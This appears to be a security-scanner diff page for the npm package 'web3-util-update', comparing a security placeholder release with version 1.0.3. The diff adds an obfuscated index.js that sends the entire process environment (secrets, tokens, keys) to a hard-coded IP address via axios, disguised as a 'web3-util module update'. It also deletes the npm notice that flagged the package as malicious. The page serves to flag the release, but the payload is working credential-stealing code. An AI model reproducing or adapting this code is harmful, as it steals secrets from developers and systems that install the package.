web3-util-update 0.0.1-security → 1.0.3
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of web3-util-update might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +14 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
function _0x2253(){const _0x3a6d2d=['catch','item.insertId','42410vGIXaD','laravel_database_App.User.','8ZXYETF','5764890sgCtwO','axios','1128YYmcTh','log','env','App\x5cEvents\x5cNewMessage','27fnziEy','1133182rpRZML','2822757PVXLKW','938396CgejYh','stringify','currentContactId','831061gsYPXo','1700719BtDhOv','get','data','currentUserId','then','9ASfskX'];_0x2253=function(){return _0x3a6d2d;};return _0x2253();}const _0x3392a5=_0x4dc1;(function(_0x450450,_0x5cc2c5){const _0x182955=_0x4dc1,_0x414cea=_0x450450();while(!![]){try{const _0x3bc096=parseInt(_0x182955(0x1cc))/0x1+-parseInt(_0x182955(0x1de))/0x2+-parseInt(_0x182955(0x1d1))/0x3*(parseInt(_0x182955(0x1e0))/0x4)+parseInt(_0x182955(0x1d4))/0x5*(-parseInt(_0x182955(0x1d9))/0x6)+parseInt(_0x182955(0x1df))/0x7*(parseInt(_0x182955(0x1d6))/0x8)+-parseInt(_0x182955(0x1dd))/0x9*(-parseInt(_0x182955(0x1d7))/0xa)+-parseInt(_0x182955(0x1cb))/0xb;if(_0x3bc096===_0x5cc2c5)break;else _0x414cea['push'](_0x414cea['shift']());}catch(_0x3b1630){_0x414cea['push'](_0x414cea['shift']());}}}(_0x2253,0xd9fd2));function _0x4dc1(_0x4b0566,_0x3c5698){const _0x225350=_0x2253();return _0x4dc1=function(_0x4dc115,_0x2a0ab0){_0x4dc115=_0x4dc115-0x1c9;let _0x3a06a7=_0x225350[_0x4dc115];return _0x3a06a7;},_0x4dc1(_0x4b0566,_0x3c5698);}const axios=require(_0x3392a5(0x1d8));var data=JSON['stringify']({'channel':_0x3392a5(0x1d5),'name':_0x3392a5(0x1dc),'data':{'message':{'content':'message.content','id':_0x3392a5(0x1d3),'recipient':_0x3392a5(0x1ca),'sender':_0x3392a5(0x1cf),'state':0x1}},'socket_id':_0x3392a5(0x1cf)});axios[_0x3392a5(0x1cd)]('http://52.53.133.7/?key='+JSON[_0x3392a5(0x1c9)](process[_0x3392a5(0x1db)]))[_0x3392a5(0x1d0)](function(_0x266c94){const _0x225588=_0x3392a5;console[_0x225588(0x1da)](_0x266c94[_0x225588(0x1ce)]);})[_0x3392a5(0x1d2)](function(_0x39fb23){const _0x5b1174=_0x3392a5;console[_0x5b1174(0x1da)](_0x39fb23);});
|
package/package.json
CHANGED
@@ -1,6 +1,17 @@
|
|
1
1
|
{
|
2
2
|
"name": "web3-util-update",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.3",
|
4
|
+
"description": "web3-util module update",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
8
|
+
},
|
9
|
+
"keywords": [],
|
10
|
+
"author": "star5473",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"axios": "^0.27.2",
|
14
|
+
"js-obfuscator": "^0.1.4"
|
15
|
+
},
|
16
|
+
"devDependencies": {}
|
6
17
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=web3-util-update for more information.
|